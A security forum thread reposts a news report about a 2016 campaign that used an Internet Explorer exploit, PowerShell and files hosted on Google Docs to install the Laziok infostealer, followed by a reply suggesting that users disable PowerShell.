Windows PowerShell and Google Docs Abused to Spread Laziok Trojan

A

Alkajak

Thread author
During the month of March 2016, a threat group has used a combination of exploits in Internet Explorer, the no-limits scripting of Windows PowerShell, and malware stored on Google Docs to infect targets with the Loziak trojan.

The Loziak trojan surfaced on the malware scene in March 2015, when Symantec observed cyber-espionage groups using it to spy on companies from the energy sector in countries from the Middle East.

Loziak is a simple infostealer, regularly used in reconnaissance campaigns when threat groups are gathering information on their target to use in attacks at a later stage.

Attack starts with malicious JavaScript code hosted on a Polish server
Malware analysts from security firm FireEye stumbled upon this threat while sifting through telemetry data, and say that in this particular distribution campaign, crooks were using malicious JavaScript hosted on a Polish server.

When a victim using the Internet Explorer browser would get tricked into accessing a page hosting the malicious code, an exploit would execute, leverage the CVE-2014-6332 vulnerability and execute VBScript via Internet Explorer.

All IE versions from 3 to 11 are vulnerable, and the crooks would enter a so-called GodMode on the user's machine. From here, the crooks would use Windows PowerShell scripts to download the Loziak executable from a Google Docs URL.

Loziak is a perfect reconnaissance tool
Loziak is installed, and the trojan immediately starts collecting information on its targets. The infostealer would collect information on the computer's name, CPU details, RAM size, location (country), and if the user had any antivirus software installed.

The data would then be sent to the crooks' servers, where it will probably be used in other attacks if they didn't happen yet.

Security researchers found it extremely curious that crooks managed to host Loziak on Google's servers. Google is known to run automated virus scans on all the files hosted on its servers.
 
H

hjlbx

Thread author
Disable or uninstall powershell. Most users have no need of it. You can reinstall it via Programs.
 

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

User Menu

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top